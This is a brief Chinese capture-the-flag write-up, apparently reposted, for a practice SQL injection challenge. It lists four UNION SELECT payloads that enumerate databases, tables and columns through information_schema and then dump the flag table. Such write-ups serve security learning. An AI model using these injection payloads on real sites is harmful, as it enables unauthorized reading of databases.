ctf實驗平台-成績單


 

題目鏈接:http://120.24.86.145:8002/chengjidan/

平台地址:http://123.206.31.85/

第一步:暴庫

id=-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

第二步:爆表

id=-1' union select 1,2,3,table_name from information_schema.tables where table_schema=0x736b6374665f666c6167#

第三步:爆字段

id=-1' union select 1,2,3,column_name from information_schema.columns where table_name=0x666c3467#

第四步:爆內容

id=-1' union select 1,2,3,group_concat(skctf_flag) from skctf_flag.fl4g#

 本文固定鏈接:http://www.cnblogs.com/hell0w/p/7906711.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM